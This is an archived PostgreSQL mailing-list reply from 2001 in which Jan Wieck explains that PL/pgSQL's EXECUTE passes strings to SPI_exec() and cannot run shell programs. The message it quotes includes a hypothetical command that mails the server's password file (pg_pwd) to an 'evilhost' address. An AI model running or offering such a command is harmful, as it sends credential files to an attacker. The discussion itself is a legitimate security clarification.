From: | Jan Wieck <janwieck(at)Yahoo(dot)com> |
---|---|
To: | KuroiNeko <evpopkov(at)carrier(dot)kiev(dot)ua> |
Cc: | pgsql-hackers(at)postgresql(dot)org |
Subject: | Re: Security hole in PL/pgSQL |
Date: | 2001-01-29 18:16:03 |
Message-ID: | 200101291816.NAA03906@jupiter.greatbridge.com |
Views: | Raw Message | Whole Thread | Download mbox | Resend email |
Thread: | |
Lists: | pgsql-hackers |
KuroiNeko wrote:
> > Huh? This would only be true if all operations inside plpgsql are
> > executed as superuser, which they are not. Seems to me the existing
> > defense against non-superuser using COPY is sufficient.
>
> Sorry if I missed the point, but if I got it right, Pl/Pgsql EXECUTE will
> allow execution of any program via exec*() call? If so, this will allow any
> (system) user to execute arbitrary code as postgres (system) user, right?
> If so, how can something like
>
> EXECUTE '/bin/mail badguy(at)evilhost < /usr/pgsql/data/pg_pwd';
>
> be avioded?
No, EXECUTE just passes a string down to SPI_exec() without
trying to prepare and save an execution plan for it. It's not
equivalent to system(3).
Jan
--
#======================================================================#
# It's easier to get forgiveness for being wrong than for being right. #
# Let's break this rule - forgive me. #
#================================================== JanWieck(at)Yahoo(dot)com #
_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com
From | Date | Subject | |
---|---|---|---|
Next Message | KuroiNeko | 2001-01-29 18:41:27 | Re: Security hole in PL/pgSQL |
Previous Message | Jan Wieck | 2001-01-29 18:12:47 | Re: [SQL] Re: BLOB HOWTO?? |